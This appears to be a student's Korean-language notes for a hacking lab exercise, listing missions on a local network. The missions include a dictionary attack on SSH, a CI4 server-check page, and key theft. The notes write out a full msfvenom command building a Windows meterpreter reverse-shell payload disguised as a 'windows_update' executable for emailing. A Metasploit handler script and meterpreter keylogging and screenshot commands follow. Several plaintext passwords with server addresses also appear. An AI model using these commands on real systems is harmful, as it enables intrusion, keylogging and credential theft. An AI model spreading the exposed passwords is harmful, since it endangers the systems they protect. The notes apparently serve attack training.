사전공격하여 ssh 192.168.0.106 메인서버에 접속
암호는 공유서버에 저장되어 있음
master 암호와 root 암호는 동일함 2345
스캔은 했는가?
접속 포트 : 22253
미션1
메인서버에 접속하여 본인의 이니셜 계정 생성후
ksj.st.kr이 동작하도록 설정할것
미션2
CI4를 이용해 서버 점검 페이지를 만들어라
서버마다 각 계정 부여후 각자 만들것
일일 점검 내용은 chatgpt를 이용해 스크립트 작성후 웹화면으로 꾸미기
미션3
칼리 악성코드 작성후 master@st.kr로 메일보내기
본인의 IP로 만들어 보내기
어댑터에 브릿지
아이피 스캐너 돌려서 고정IP변경
IP:192.168.0.10 SM:24 GW:192.168.0.1 DNS:125.246.95.253
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -b "\x00" -f exe -o /home/kali/windows_update_ip210.exe
nano malware.rc
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.10
set lport 4444
exploit
msfconsole -r /home/kali/malware.rc
meterpreter > keyscan_start
keyscan_dump
screenshot
command help
ssh 125.246.95.253
master 8888
root 7777
미션4
미션1,2,3 완료후 키인증 방식으로 변경
관리자가 생성한 키를 유출하여 접속하기
키로 해커가 접속을 해서 시스템
정상 0 Sector
Partition1 : 2048 partition1 : 63
partition2 : 32770048 partition2 : 41945715